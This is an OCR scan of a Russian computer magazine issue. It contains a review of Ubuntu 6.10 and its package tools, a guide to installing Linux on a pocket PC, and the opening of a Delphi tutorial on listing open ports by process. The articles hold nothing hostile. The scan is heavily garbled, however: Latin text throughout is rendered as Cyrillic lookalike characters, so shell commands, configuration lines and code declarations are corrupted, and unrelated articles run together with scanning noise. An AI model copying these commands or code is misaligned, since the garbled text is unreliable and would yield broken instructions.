> Может, и не слишком привлекательно, зато работает 
почти на любом терминале 



Загрузка, по сравнению с предыдущей версией 6.06, выпол- 
няется несколько быстрее, хотя и не столь информативно 

— никакие сведения о выполняемых действиях на экран не 
выводятся. Введя логин и пароль созданного в процессе 
установки пользователя, мы попадем в среду Ѳпоте — в от- 
личие от некоторых других дистрибутивов, здесь не предла- 
гаются на выбор различные рабочие столы и т.д. Благодаря 
этому, в частности, дистрибутив и разместился достаточно 
вольготно на одном-единственном СБ-диске. 

Нуа для ценителей КБЕ предлагается КиЬипШ. 

Из чего же собран этот дистрибутив? Ядро — 2.6.17-10, Хо гд 

— 7.1.1, Ѳпоте — 2.16.1 . Этими тремя компонентами, по 
большому счету, и определяются основные особенности сис- 
темы, такие как поддержка оборудования, автомонтирова- 
ние дисков и флешек, скорость загрузки и работы, частично 

— внешний вид. 

Что особенно порадовало меня как владельца ноутбука, так 
это улучшенные опции управления питанием. Например, 
появился ждущий режим (в 6.06 «из коробки» присутствовал 
только спящий). Настройки энергосбережения («Система 
->Параметры->Управление питанием») можно выполнять 
раздельно для режимов «Работа от сети» и «Работа от ба- 
тареи». Изменение частоты работы процессора (если тот ее 
поддерживает) тоже функционирует превосходно. 

Вместе с обновленной средой Ѳпоте пришли ТотЬоу (весь- 
ма удобная гипертекстовая записная книжка в стиле ѴѴІкі) 
и апплет «Липкие записки», позволяющий быстро, пока не 
забылось, «прилепить» на монитор какую-нибудь заметку. 
Помимо достаточно стандартного для Ѳпоте набора «мело- 
чевки», в ІІЬііпІи 6.10 входят: 

• ОрепОЛІсе.огд 2.0.4: самая свежая на момент выхода дис- 
трибутива версия одного из мощнейших офисных пакетов 
(кстати, по сравнению с 2.0.2, скорость загрузки стала замет- 
но выше, но хотелось бы, чтобы он работал еще быстрее). 

• Еігеіюх 2.0: тоже «последний писк» самого популярного 
в среде Біпих браузера. 

• Еѵоіибоп 2.8.1 : почтовый клиент, претендующий на то, 
чтобы встать в один ряд с ОиЛоок от Місгозок. 

• Ѳітр 2.2.13: вездесущий графический пакет. Ксожале- 
нию, разработчики дистрибутива не дождались версии 2.4, 
а «девелоперскую» 2.3 включать не рискнули. 

• Екіда 2.0.3: ІР-телефон с поддержкой 5ІР и Н.323. 

• Ѳаіт 2.0.0Ье1а3.1 : один из самых популярных в среде 
Ѳпоте ІМ-пейджеров. 

Присутствует и россыпь программ для просмотра различных 
графических и рек-файлов, для работы с видео и звуком, 
с фотографиями и т.д. Правда, ІІЬипІи постигла та же беда, 
что и большинство открытых дистрибутивов: в поставке 




> Первым делом лезем в настройки 



и даже в репозитариях отсутствуют за крытые программы 
(например, Орега, хотя ее беб-пакет всегда можно забрать 
с орега.сот ). а также инструменты для работы с закрытыми 
форматами файлов. Это означает, что в свежепоставлен- 
ном ІІЬипіи прослушать трЗ-файл тебе неудастся. Но эта 
проблема решается достаточно легко: с сайта еазѵиЬипІи . 
ІгеесопІгіЬ.огд скачиваем утилиту ЕавуІІЬипІи, устанавли- 
ваем ее, инсталлируем ключ, которым будет проверяться 
подлинность пакетов, и запускаем: 

$ ѵ/деС ТШЪр : / / еазуиЪипки . ТгеесопкгіЪ . огд / 

| Ті1ез/еазуиЪипки_1акезк . сІеЪ 
$ зисіо сіркд -і еазуиЬипРи_1аДезД . <іеЬ 
$ чл/дек кккр : / /раскадез . ТгеесопкгіЪ . огд/ 
иЬипки/р1Б/12В83718 . дрд -О — I зисіо арк-кеу 
асШ. - 

$ еазуиЬипки 

На вкладках появившегося окна отметь то, что хочешьуста- 
новить, — кодеки, проприетарные драйверы для видеокарт 
ЫѴІбіа и АТІ, Масготебіа ЕІазН, баѵа, Экуре, ПАП, шрифты 
Місгозок... Только учти, что объем закачки может оказаться 
весьма значительным. 

ОУправление пакетированием 

Понятно, что хотя входящие в дистрибутив пакеты и способ- 
ны удовлетворить достаточно широкий диапазон потребнос- 
тей (мне, например, для полного счастья разве чтоХЭоІбіег 
не хватило), тем не менее, рано или поздно возникает 
желание поставить что-то еще. Так как в основе ІІЬипІи ле- 
жит БеЬіап, то к твоим услугам — необозримые репозитарии 
беЬ-пакетов на все случаи жизни. Правда, поскольку на один 
СБ много не влезет, практически все придется устанавли- 
вать из Сети. 

Из инструментов для работы с пакетами в системе присутс- 
твуют следующие: 

• АРТ : знакомый пользователям БеЬіап и отечественного 
АБТЫпих инструментарий. С помощьюутилит/изг/Ьіп/арі-деі 
и /изг/Ьіп/арі-сасЬе можно решать практически все задачи 
по управлению пакетами в системе. Дополнительная инфор- 
мация — на тап-страницахарі(8), ар1-де1;(8), ар1-сасЬе(8), 
арксопКб), зоигсе5.1із1:(5). Другие средства, описанные ниже, 
во многом опираются на АРТ, так что хотя бы поверхностное 
знакомствос ним не помешаетв любом случае. 

• аріііибе: эту утилиту можно рассматривать какоченьудоб- 
ный фронт-энд к инструментарию АРТ. Запустив ее без клю- 
чей, ты увидишь псевдографическую среду, позволяющую 

в визуальном режиме работать с установленными в системе 



/ ііб 
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> И контакты, и заметки, и календарь — чем не М5 ОиНоок? 



>Авоттакуже намного приятнее работать с пакетами! 



пакетами, инсталлировать новые и т.д. Помимо 
интерактивного режима работы, поддерживает- 
ся и командный, как в случае арі-деі/арі-сасИе 
(на мой взгляд, более удобный). 

• Зупарбс: графическая «надстройка» над АРТ, 
предоставляющая все возможности арбіибе, 
но в более удобном графическом окне. Здесь 
же можно парой щелчков мышью подключить 
дополнительные репозитарии пакетов, а не во- 
зиться с редактированием Мс/арі/зоигсез.ІізЕ 
Кстати, этим файлом руководствуются все 3 
инструмента, упомянутые на данный момент. 

• сіркд : это уже инструмент для работы непос- 
редственно с беЬ-пакетами, а не с репозитари- 
ями. То есть если ты раздобыл где-то беЬ-пакет, 
то попытаться установить его можно простой 
командой: 

# сіркд -і орега-зкакіс_9 . 02- 
20060919. 1 - дС_еп_і 3 8 6. сіеЬ 

Выше я сказал «попытаться установить», потому 
что в этом случае тебе придется самому разби- 
раться со всеми зависимостями, еслитаковые 
обнаружатся. 

• бзеіесі:: интерактивная оболочка к бркд. 
Правда, в текущей версии дистрибутива мне 

не удалось нащупать кодировку, которая бы поз- 
волила понять, что написано в локализованном 
варианте. Так что для работы приходится снача- 
ла уста на вливать английский язык: 

# ехрогС ЬАЫС=еп_из .ІІТР-8 

# сізеіеск 

• ѲОеЬі: графическая утилита, являющаяся фронт- 
эндом к сіркд. Именно она будет за пускаться, если 
в Ыаиіііиз дважды щелкнуть по беЬ-файлу. 

Как видишь, в способах работы с пакетами ты ни 
в коей мере неограничен. Ну и, самособой, никто 
не запрещаеттебе собирать приложения вручную. 

□Административный аппарат 

Думаю, после прочтения предыдущего раздела 
у тебя возник вопрос: а какже мы работаем 



с правами гооі (очевидно, что они необходимы 
для установки/удаления пакетов), если пароль 
суперпользователя мы нигде не задавали? 
Фокус в том, что ІІЬипіи не предполагает работу 
отимени гооі, довольно настойчиво приучая 
пользователя к утилите зибо. То есть, чтобы 
выполнить какую-то рутовую команду, следует 
поступатьтаким образом: 

$ зисіо ѵі /еСс/ТзСаЬ 

Когда система запросит пароль, нужно ввести 
свой пользовательский. Просто чтобы подтвер- 
дить, что ты — это ты... Правда, иногда приходит- 
ся выполнять довольно большую «администра- 
тивную» работу и в каждой строчке набирать по 
5 лишних символов («зибо» + «Пробел»), На этот 
случай есть обходной маневр: введи «зисіо зи» 
или «зибозб» — и ктвоимуслугам привычная 
рутовая командная строка. 

Есть и более официальный путь — терминал 
суперпользователя. Однако он довольно глу- 
боко запрятан. Открой «Система Параметры 
-> Редактор меню» и в разделе «Системные» 



отметь соответствующий пункт. Заодно, руко- 
водствуясь своими предпочтениями, можно 
скрыть или включить другие пункты. 

Кстати, здесь, в «Параметрах», система до- 
вольно гибко подстраивается под свои нужды. 
Более серьезные настройки, такие как«Сеть», 
«Сервисы», «Установка пакетов» и т.д., вынесе- 
ны в раздел меню «Администрирование». При 
выборе каждого из этих пунктов тебя попросят 
ввести пароль — как и в случае с зибо, вводить 
нужно свой пароль пользователя. 

□ Заключение 

Каквидишь, ІІЬипІи —достаточно удобный для 
работы дистрибутив. Он оченьхорошо подходит 
для первого знакомства с Ыпих. Он превосхо- 
ден для тех, кто хочет просто работать в Ыпих, 
а не ковыряться в ядре и пакетах бессонными 
ночами — с ним можно почти не думать об осо- 
бенностях системы. С каждым новым релизом 
чувствуется заметный прогресс, и в тоже время 
определенная сдержанность разработчиков 
гарантирует высокое качество и стабильность 
дистрибутива. ЗЛ 



> Маленькая, да удаленькая утилитка — и никаких проблем с закрытыми пакетами 
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ПРИРУЧЕНИЕ 
КАРМАННОГО ТУКСА 



ПОЛНОЦЕННАЯ Ыыих-СИСТЕМА НА ТВОЕМ КПК 

Ілпих на карманном компьютере — зачем это нужно? Действительно, зачем, если 
с каждым КПК идет ОС, к которой нет никаких серьезных претензий и для которой раз- 
работано огромное количество софта? Ответ кроется в функциональности. МісгозоН 
умудрилась низвести такое великолепное устройство, как наладонник, до электронно- 
го органайзера с мультимедиа-функциями! Притом с крайне неудачным интерфейсом. 
После установки Ілпих ты получишь полноценную машину, на которую при желании 
можно установить любой машинно-независимый пакет из огромного репозитория 
СПІІ/Ьіпих, где даже самый взыскательный пользователь найдет себе необходимую 
программу. 




ХАКЕР 02 /98/ 07 






^ ипіхоігі 



3 гоцглшл 



•■йЕ 






ьп 



к 



4м т I 1 ** 



Ё-ч^оГі 



ШАІ 



ОН 



Сой*Иг*ЬеГі Ай&ПЛМ* 5«ІѴ0 съл*іт*.Ь>п 

іШІ 



м 

іРАМгаим 



?? 

КіЛомгі 5сЬф ІіОікЬѵ 5#Р*р 



ОчяНгіл^гіі'Вой &п*п$чШЧ* Йп*іі 5іИр 










ао 


Й 


© 


& 




Ввек 


Ви№п 


□лілТігти# 


МЧІі 




СояНд 


5«4ир 


5е1ир 


0 


із 


гМ 

ЧР 


’ф 


Інк апсі 


Му ѴС»пІ 


Ноіиогк 


НѵЮТк 




$ 


5«1ир 

121 


Щ 


ОѵѵП#Г 


№ кад* 


Р*п§1 


РОС? 


1 п Гсгіля Іій 


Мапауаг 


Цімд*г 


СлгсІ а 


ш 


X? 


0 


ш 




5сгмп 






ТпНпФг 




РѵПщ 


Сопіід 






22:16 



ікімл 



л л 

ІЛА1 



ё ё Ж ё 



> Настраивается все, абсолютно все! 



> Панель управления 
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> Воттак может выглядеть рабочий стол 



О Всегда есть выбор 

После установки І_іпих на КПКты можешь ис- 
пользовать ядро стандартное или свое, заюзать 
понравившуюся графическую оболочку или 
дописать любую из существующих. О выборе 
софта я уже и не говорю (к слову, встроенная 
в ѴѴІпбоѵѵз МоЬІІе программа Ехсеі по всем пара- 
метрам проигрывает прекрасно работающему 
Ѳпитегіс, а, например, чем Рі гебох лучше ІЕ, и 
говорить не надо). Широчайший простор для 
творчества, работы и исследований! Ты волен 
изменять все что угодно, ведь это Ыпих! 

Работа с сетью, как всегда, на высоте. Более 
того, КПКможно превратить в любой сервер, 
какой пожелаешь, и он будет работать. К тому же 
присутствуют и приятные дополнительные 
бонусы, например звуковые карты, которые в 
ѴѴІпбоѵѵз функционировали исключительно в 
полудуплексном режиме, а в Ыпих работаютчест- 
но, на полную мощность. А в некоторых моделях 
Н Р і РАО есть возможность вывести внешний 
ІІ5В-коннектор, чтобы подключить к КПК мышку, 
клавиатуру, принтер, кардридер и I Іа 5 Ь- карту, 
ведь поддержка ІІЗВ-ИозЕа естьтолько в Ыпих! 
Подробнее об этом читай во врезке. 

□ ОШ 

На текущий момент для КП К существуют два 
динамично развивающиеся графических 
пользовательских интерфейса: 6РЕ (использует 
ХѴѴІпбоѵѵз Зузіет и 6ТК в связке с ѵѵібдеБооІкіі) 
и ОРІЕ (одна из ветвей окружения СКоріа фирмы 
ТгоШюсЫ. У каждой из этих ѲІЛ имеются как 
плюсы, так и минусы. Однако ситуация напоми- 
нает конкуренцию КБЕ и ѲКІОМЕ на больших 
компьютерах — фанатики ведутсвященные 
войны, а пользователи работают втой среде, 
которая им больше приглянулась. Я все же ре- 
комендую 6РЕ — для этой разработки существу- 
ет большее количество готового софта. 



О Совместимость 

Увы, пока не для всех КПК есть собранные 
дистрибутивы. Больше всего повезло, конечно, 
владельцам наладонников от НР, ведь именно 
для них был создан один из самых всесто- 
ронне протестированных и поддерживаемых 
дистрибутивов — Еатіііаг Ыпих. Однако 
владельцам других моделей отчаиваться рано 
— на сегодняшний день Еатіііаг поддерживает 
достаточно большое количество моделей, кроме 
того, это не единственный дистрибутив — есть 
еще АпдзБопп, Маето... А как показывает 
практика, портирование ядра для конкретной 
модели — это нетакая невыполнимая задача, 
как кажется на первый взгляд. 

□ Установка 

Для установки дистрибутива Еатіііаг на КПК, 
прежде всего, необходимо иметь: 

1. обычный комп слюбым современным дист- 
рибутивом Біпих (установка с ѴѴІ п б оѵѵб- систем 
также возможна, но осуществляется сложнее); 

2 . НазИ-ка рта СБ/СЕ объемом от 128 Мб; 

3. Р5232 или 115В. 

Кабельлучше иметь Р5232,так какс его помо- 
щью можно отслеживать за грузку ядра в режиме 
реального времени, даже если экран КПК не 
работает. К тому же не потребуется никаких 
дополнительных программ, установку можно 
будет провести с любой платформы. Инсталля- 
ция посредством ІІ5В-кабеля возможна только 
с Бі п их- П К, имеющего пропатченное ядро 
(изЬпеі). 

Первым делом необходимо сохранить всю 
информацию с карточки и памяти КПКгде-ни- 
будь в надежном месте и полностью зарядить 
аккумулятор. Далее предполагаем, чтоу нас 
есть дистрибутив, работающий именно с нашей 
моделью КПК, 135232-кабель, Біпих-десктоп, 
КПКс ОБ БазЬ-картой. 



□ Вариант 1 : загрузка без перепрошивки 
ВооНоабег'а 

Для загрузки без перепрошивки ВооШоабег'а 
нам понадобится Иагеі: — программа для загруз- 
ки ядра из окружения ѴѴІпбоѵѵз. Последователь- 
ностьдействий будеттакова: 

1. Разбиваем карточку на два раздела: один 
— ЕАТ, другой — ехИ 

2 . Создаем папку на ЕАТ-разделе, в которой 
будет установлен Бі п их, допустим/ііп/. 

3. Ищем в дистрибутиве ядро (название начи- 
нается с гітаде, переименовываем в кегпеі), 
копируем кегпеі в /И п/. 

4. Создаем в/ііп/обычный текстовый документе 
именем Б^аБир.М следующего содержания: 

НАСТРОЙКА ЗАГРУЗКИ ЯДРА 

зек КЕІШЕЬ кегпеі 
зек МТУ РЕ 341 

зек СМБЬШЕ «гоок= /йеѵ/гшпсЫкОрІ 
поіпікгеі сасБеро1ісу=шгікеЪаск 
сопзо1е=кку80 , 115200п8 
сопзо1е=кку0» 

Ьоокііпих 

Для карточек СЕ запись «гооБ/беѵ/ттсЫкОрІ » 
следует поменять на «гооБ/беѵ/ИбаІ ». 

5. Копируем Баге! в /Ііп/. 

6 . Копируем гооБб на раздел с ехБ. 

7. Запускаем ѵѵгар-Ьагекехе и ждем загрузки. 

□ Вариант2: полноценная установка 

Для реализации этого варианта нам нужна 
программа установки загрузчика ВооіВІазіег 
и непосредственно сам загрузчик *.Ьіп. Все 
эти файлы мы можем найти в дистрибутиве. 
Сначала поставим загрузчик: для этого за- 
пускаем ВоокВ ІаБкег, выполняем сохранение 
ѴѴІпбоѵѵз и старого загрузчика («ЕІазЬ ^5аѵе 
ВооБсІг.дг» и «ЕІазЬ ^5аѵе ѴѴІпсе.дг»), теперь 
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> На рынке есть и 
КП К с уже предуста- 
новленным Ыпих'ом 
— это КІокіа 77 0 и 
многие модели от 
ЭЬагр. 



>На прилагаемом 
кжурналудиске 
ты найдешь все 
необходимые 
конфигурационные 
файлы и скрипты для 
подключения КПК 
к интернету через 
мобильный телефон. 



> оріе.ЬапбЬеІб5.огд 

— сайт проекта Оріе. 
іихтоЬіІ.огд — все, 
что связано с пере- 
носом Ыпих'а на мо- 
бильные устройства. 
ѵѵѵѵѵѵ.ЬапбЬеІбв.огд 

— крупнейший 
сайт, посвященный 
открытому програм- 
мному обеспечению 
для КПК. 
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> Работа в терминалке 



перепрошиваем загрузчик («ЕІазЬ -> Ргодгат»), после 
этого обязательно проверяем корректность установки 
(«ЕІазЬ -> Ѵегіф»), В случае некорректной прошивки, 
повторяем процедуру еще раз, если и это не помогает, 
восстанавливаем стандартный загрузчик. 

Теперь приступаем кустановке системы. Подключив 
КПК к компьютеру (через СОМ -порт), мы получим 
полноценный Ыпих-терминал , приконнектиться к 
которому можно при помощи любой терминальной 
программы. Параметры подключения: 1 15200; 8І\1 1 ; 
Ноѵѵ сопігоі — отключено; Иагбѵѵаге ИапбзИакіпд 
— отключено. 

После подключения получаем приглашение от сис- 
темы, вводим команду «ІоасІ гооі», далее, используя 
протокол У- т обет, посылаем на КПК файл с расши- 
рением *щК 52, извлеченный из дистрибутива. Это 
довольно длительная операция. Когда же мы снова 
увидим системное приглашение, введем команду 
«Ьооі». Все, система установлена ! 

□ Пересборка ядра и приложений 

Процедура портирования ядра на разные модели КПК 
может существенно варьироваться, поэтому приведу 
лишь общие рекомендации. Если ни твой КПК, ни его 
ближайшие по архитектуре родственники не имеют 
поддержки со стороны дистрибутивов, то необходи- 
мо разобрать его (гарантия после такой процедуры, 
естественно, идетлесом), считать все маркировки 
и идентифицировать их. Тут тебе могут помочь либо 
интернет, либо специальные каталоги, либо знако- 
мый из сервисного центра. Необходимо любым из до- 
ступных способов получить уникальный МАСНІЫЕ Ю 
и найти ЛАЭ- интерфей с. Далее нужно узнать, какие 
из работающих на Ыпих КПК используютте же чипы, 
что и твой КПК. После этого берется ядро для такого 
КПК и из него вытаскивается модуль, соответствую- 
щий чипу устройства, иначе переделывается готовый 



модуль для его ближайших родственников. 

Таким образом и собираются ядра, так как 99% КПК 
на рынке построены на сходной аппаратной базе. 

Для всей процедуры нам потребуется Ьагеі: — велико- 
лепная программа для реверсного инжиниринга, точ- 
нее, ее переделанная версия, которая не сбрасывает 
состояния устройств, что позволяет не инициализиро- 
вать их в ядре. После этого пишется (переделывается, 
копируется) ЫАЫВ-драйвер. Все это можно проделать 
при помощи автоматизированно й системы сборки 
Ореп ЕтЬеббеб, огромным плюсом которой является 
создание собственного дистрибутива с собственными 
программами и пропатченным ядром. Однако удо- 
вольствия от этого мы не получим никакого, поэтому 
будем делать все вручную. 

Первым делом скачиваем пакет для кросс-компи- 
ляции ргебиііб ІюоІсЬаіп, забираем приглянувшуюся 
версию ядра и устанавливаем заголовочные файлы на 
наши исходники (Іп -з). Теперь ищем по всей паутине 
патчи на наше ядро, которые, как нам кажется, будут 
нужны, и устанавливаем их. Компилируем ядро и, 
если все идет нормально, ставим модули, после чего 
редактируем плаке-файл (прописываем корректные 
пути к компилятору и исходникам). Далее набираем 
команды «плаке» и «плаке іпзіаіі». Вуаля! Наше ядро 
готово! Копируем модули и ядро на КПК и загружаем. 
Пересборка приложений осуществляется таким же 
образом. 

Конечно, это не приятная прогулка, но, надеюсь, 
решившиеся на эту непростую работу получат много 
удовольствия. И если твои эксперименты завершатся 
успешно, не сочти за труд поделиться своим опытом с 
менее настойчивыми туксоводами. 

О Софт на каждый день 

Ниже описаны самые нужные приложения, готовые к 
установке и нетребующие пересборки. Найти их можно 
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в ІеесГах на официальном сайте Ратіііаг. Стоит 
отметить, что в стандартной поставке Ратіііаг 
идетбольшое количество программ. 
Незнакомого софта тут не найдешь, в основ- 
ном это портированные версии «больших» 
программ. 

Міпіто — Еігеіох для КПК, поддерживает все 
технологии и стандарты, присущие «большому» 
огнелису. Субъективно, пользоваться им намно- 
го удобнее, чем ІЕ. 

Ыпкв — великолепныйтекстовый браузер. 

ОІИо — браузер, разработанный с нуля; отличная 
поддержка кириллицы. Жаль, что не поддер- 
живает 55 1_ по умолчанию, а все мои попытки 
сделать это вручную, увы, окончились неудачей. 
ЗуІрЬеесІ — лучший из всех протестированных 
мной почтовых клиентов на КПК. 

Саіт — наверняка знаком большинству 
читателей. КПК-версия обладаеттой же 
функциональностью. 

Ѳ РЕ- РІ М — хороший РІМ, не уступает своим 
конкурентам ни в Ы пих, ни вѴѴІпсіоѵѵв. Присутс- 
твует возможность синхронизации с Еѵоіиііоп и 
ОіЖоок. 

ЕЬгеабег — лучшая из программ для чтения книг 
как для КПК, так и для настольных систем. Мно- 
жество функций, продуманный интерфейс, 
брсіі — добротная программа для чтения 
рф-файлов. 

Ѵі — легендарный текстовый редактор, теперь 
и для КПК. Однако продуктивно работать с ним 
можнотолько при наличии ВТ-клавиатуры (ска- 
зывается тяжелое консольное детство). 

АЬІѴѴогсІ — текстовый процессор, по функци- 
ональности на две головы выше, чем тот же 
мобильный ѴѴогсІ. Пересобран из настольной 
версии. 

Ѳпитегіс — после общения с этой программой 
мобильный Ехсеі кажется кустарной поделкой. 
По функциональности полностью аналогичен 
своему «большому» брату. 

Ытар — один из лучших сканеров портов. 

Х-СЬаІ: — ІРС- клиент. Функции стандартны, 
интерфейс в меруудобен. 

МібпідЫ; Соттапсіег — удобный консольный 
файловый менеджер, стандарт де-фа кто на 
десктопах. 

□ Работа с 115В, 

подключение к компьютеру и интернету 

На Ьтих-десктоп с ІІ5В-хабом необхо- 
димо установить два модуля ядра: сам 
модульдля ІІ5В-хаба и ивЬпек На сторо- 
не наладонника ІІ5В-драйвер и ивбпеі в 
большинстве случаев уже установлены. 
Единственное, что требуется сделать, 

— прописать соответствующие ІР-адреса. 



Вот какя изменил часть «і Іа се ивЫ іпеі: 
БІа1:іс» этого файла: 

#ѴІ/ЕТС/МЕТѴѴОКК/ШТЕКРАСЕ 

ібасе изЫ: іпеС зкакіс 
/ / ІР КПК 

асМгезз ххх.ххх.ххх.ххх 
пеСтазк УУУ-УУУ-УУУ-УУУ 
пекмогк ххх . ххх . ххх . О 
/ / ІР десктопа 
дакемау ххх.ххх.ххх.ѵѵѵѵѵѵ 

ДЛЯ АВТОМАТИЧЕСКОГО СТАРТА ПОДКЛЮ- 
ЧЕНИЯ ПРИ ЗАГРУЗКЕ СИСТЕМЫ НАБИРАЕМ: 

# с<і/екс/гс2 . <3. 

# 1п '-3../ІПІС. сі/ іпіксІ-изЪпек 
545изЬпеС. зЬ.' 

ДЛЯ РУЧНОГО ПОДКЛЮЧЕНИЯ: 

#/екс/іпік. (З/іпіСсЗ-изЬпек зСагк 

Если компьютер подключен клокальной сети с 
выходом в интернет, то ничего делать не придет- 
ся, КПК подключится автоматически. 

□ Заключение 

бі пих пришел на КПКдостаточно недавно, и пока 
его инсталляция и работа с ним напоминает 
аналогичную ситуацию на обычном компьютере 
образца 1 996 года. Установка все еще остается 
слишком сложной для простых юзеров, наработ- 
ки больше предназначены для программистов, 
чем для пользователей. Однако и Еі п их, и КПК 
сейчас популярны как никогда, и, возможно, че- 
рез несколько лет Еіпих потеснитѴѴІпсіоѵѵв МоЬІІе ' 
хотя бы на этом секторе рынка. ЗС 



> Подключи через ІІБВ-Ьозі ксвоему КПК все чтоугодно! 



ХОЧЕШЬ... 

• использовать ресурсы КПК на все 100%? 

• иметь неограниченный простор для 
модернизации и экспериментов? 

• располагать на КПК всеми приложени- 
ями с настольного компьютера? 

• иметь действительно удобный инстру- 
мент для работы? 

КОНТРОЛЛЕР ІІ5В-Х0СТ 
В I РАО 5450/5550/5555 

► Оовба Аіех, один из разработчиков Еатіііаг, 
обнаружил, что в НР і РАО 5450/5550/5555 
. встроен контроллер ІІ5В-хост, к которому 
подключен ѴѴІ-ЕІ, однако НР не сделала 
. внешнего коннектора. Относительно 
других моделей ничего неизвестно, но, 

. скорее всего, ІІ5В-хост может присутство- 
вать и в них — ужочень производители не 
„ любят отходить от работающих решений. 

В среде ѴѴІпсІоѵѵв МоЬІІе этот контроллер 
задействовать нельзя, однако в Ыпих 
проблема решается установкой модуля 
кегпеІ-тосІиІе-ивЬ-зІюгаде. 

Имеют место 4 провода: 0+, й-, Ѳпб и +5Ѵ. 
й+ и й- подключаются к коннекторам 115В, 
бпсі — к плате, +5Ѵ— к питанию КПК или 
внешнему источнику. 

При помощи этого ІІЗВ-ЬозЕа можно под- 
ключить к КПК все чтоугодно: мышку, кла- 
виатуру, принтер, кардридер и НавЬ-карту. 
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МИХАИЛ ФЛЕНОВ 



САМ СЕБЕ 
РУССИНОВИЧ 



СОВРЕМЕННЫЙ МЕТОД ОПРЕДЕЛЕНИЯ СОСТОЯНИЯ ПОРТОВ 



В прошлый раз мы разобрались со старыми и надежными функциями определения 
состояния портов. Сегодня мы двинемся дальше и познакомимся с новыми функциями 
ѴѴіпсіоа/ѵз ХР, которые способны совершать еще немало интересного. Новый вариант 
программы будет отображать не только открытые порты, но и процессы, которые 
их открыли. В этом нам помогут функции, не описанные в заголовочных файлах БеІрЬі 
и даже ѴС ++ , поэтому мы будем их загружать динамически. 



□ Функции 

Итак, поскольку необходимых нам функций, 
как я уже говорил, в ОеІрЬІ нет и не предви- 
дится, работу придется начать с заголовочного 
файла. Нам понадобятся следующие функции: 
АНосаІеАпсІбеШсІрЕхТаЫеЕгоппЗіаск, АІІосаі 
еАпсіОеГГсрЕхТаЫеРготЗіаск, СгеаіеТооІЬеІр 
325парзЬоС Ргосезз32РігзІ и Ргосезз32І\ІехІ. 
Первые две из них реализованы в библиотеке 
ірЫрарі.сІІІ и необходимы для получения из 
стека таблицы открытых ТС Р- и II ИР- портов 
соответственно. 

Какая из функций какую таблицу возвра- 
щает, нетрудно догадаться, исходя из их 
имени. Остальныетри функции реализованы 
в ке гп е 132 . сі II и пригодятся нам для опреде- 



ления процесса, который открыл порт. 
Напомню, что в прошлый раз мы писали 
программу ТСРѴіеѵѵ с запасом на буду- 
щее, а в главном окне даже подготовили 
отдельную колонку для отображения 
имени процесса. Сегодня с помощью 
нескольких волшебных движений тазом мы 
ее заполним. 

Если ты читал предыдущую статью (а если 
не читал — вставляй ОѴй в дисковод и бери 
ее оттуда), то открывай свой заголовочный 
файл, который уже должен быть создан, 
и начинай добавлять в него описания 
функций. Как и в прошлый раз, мы будем 
объявлять функции в виде переменных, 
чтобы загружать их динамически. 



□ Состояния ТСР 

Двинемся по порядку, а значит, начнем с рас- 
смотрения функции: 

АІІосаІеАпсІ6еСТсрЕхТаЫ.еРгот5*аск: 
АІІосаіеАпббеЕГсрЕхТаЫеЕгоппЗіаск: ііпг оп ( 
рТСРТаЫе: РМІВ_ТСРЕХТАВЕЕ; 

ЬОгсІег: В001_; 

Ьеар: ТНапсІІе; 
гего: ОѴѴОРВ; 

Цадз: РѴѴОРО 
): ОѴѴОРВ; ; 

Здесь мы объявляем переменную АІІосаІеАп 
сЮеРГсрЕхТаЫеРгоппЗІаск, по сути, представ- 
ляющую собой функцию, которая принимает, 
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> Подробное описание функции Ргосе5532Ріг5І в М50ІЧ. Если > Результат работы программы. Во второй колонке показано имя 

что-то не поймешь по исходнику, хватай англо-русский словарь процесса, который инициализировал работу с портом 
и дуй сюда 



если я правильно посчитал, пять параметров. 

До пяти я вроде бы считатьумею, а если что-то 
не так, то простите старика-ветерана клавиатур- 
ноготруда. Итак, функция получает следующие 
р параметры: 

1. Указательтипа РМІВ_ТСРЕХТАВІ_Е, через 
который нам вернут массив состояния 
ТСР-портов. 

2. Булево значение, определяющее, нужно ли 
сортировать таблицу. 

3. Куча (Ьеар), в которой нужно выделить 
память для хранения результирующей таблицы. 
Вполне логично хранить результат в куче своего 
процесса, указатель на которую можно получить 
с помощью функции СеіРгосеззНеар. 

4. Флаги, определяющие, как себя будет вести 
функция с кучей. В утилите Руссиновича здесь 
зачем-то указывается двойка, и если запустить 
поиск по инету, то все найденные примеры будут 
автоматом указывать на это же число. Зачем? 
Видимо, код копируется без понимания того, что 
он делает. Нам никакие «специфические 
поведения» кучи не нужны, поэтому смело 
поставим сюда 0. 

5. Последний флаг определяет ІР-адреса, для 
которых нужно получать та блицу. Здесь можно 
указать флаг АР_І N ЕТ или АР_І N ЕТ 6 для ІР-про- 
токола шестой версии. Интернетчики опять же 
копируют код один к одному и явно указывают 
число 2 (значение константы АР_І N ЕТ) . Обе 
константы объявлены в заголовочном файле 
ѴѴІпзоск... Хотя нет, константа АР_І N ЕТ 6 есть 
только в заголовочном файле второй версии, 
ведь первый ѴѴІпзоск ничего не знал о ІРѵб. 
Запусти поиск в рунете по названию функции 
АиосаІеАпсІбеіТсрЕхТаЫеЕгоппЗіаск и в боль- 
шинстве случаев ты узнаешь, что функция 

не документирована. Кем не документирована? 
В МЗБЫ есть подробное описание, просто ис- 
кать его нужно умеючи :). Свежий тзсіп всегда 
можно найти по адресу тзсіп.тісгозок.сот. 

Да, он обновляется с задержкой и уже после 
выхода ОС, и чтобы быть впереди всей планеты, 
просто нужно купить подпискуза немалое 



количество портретов американских лидеров. 

В общем, к чему я клоню: если новой функции 
нет в старой версии справки, то это не значит, 
что описание отсутствует вовсе ;). 

Кстати, если верить МЗБЫ, эта функция ус- 
тарела и больше не поддерживается в ново- 
испеченной ѴѴІпсІоѵѵз Ѵізіа! Я Висту пока еще 
не ставил и не проверял, но если это так, наш 
универсальный пример будет как раз кстати. 
Если посмотреть в ЗБКдля Висты, можно заме- 
тить интересный факт: функция там объявлена, 
но только для совместимости. Так что не пытай- 
ся вызвать ее напрямую, иначетебя ждет крах 
программы. Что будетв качествезамены, еще 
неизвестно, а Майкрософт пока молчит. 

О Состояния ІЮР 

Таблицу состояний ІЮР-портов можноузнать 
с помощью функции АЦосаІеАпсЮеШсІрЕхТа 
ЫеЕготЗіаск, которую необходимо объявить 
следующим образом: 

АІІосакеАпйСекШрЕхТаЪІеРготЗСаск : 
ТипсСіоп ( 

рШРТаЫе: РМІВ_ББРЕХТАВБЕ; 
ЬОгсІег : ВООБ; 

Ьеар: ТНатЛе; 

2 его: ВШКВ; 

Тіадз : БѴГОВБ 
) : ВШКВ; зСсІсаІІ ; 

Ее параметры идентичны параметрам функции 
работы с ТСР-портами, за исключением пер- 
вого, который имееттип РМІВ_ІЮРЕХТАВЕЕ. 
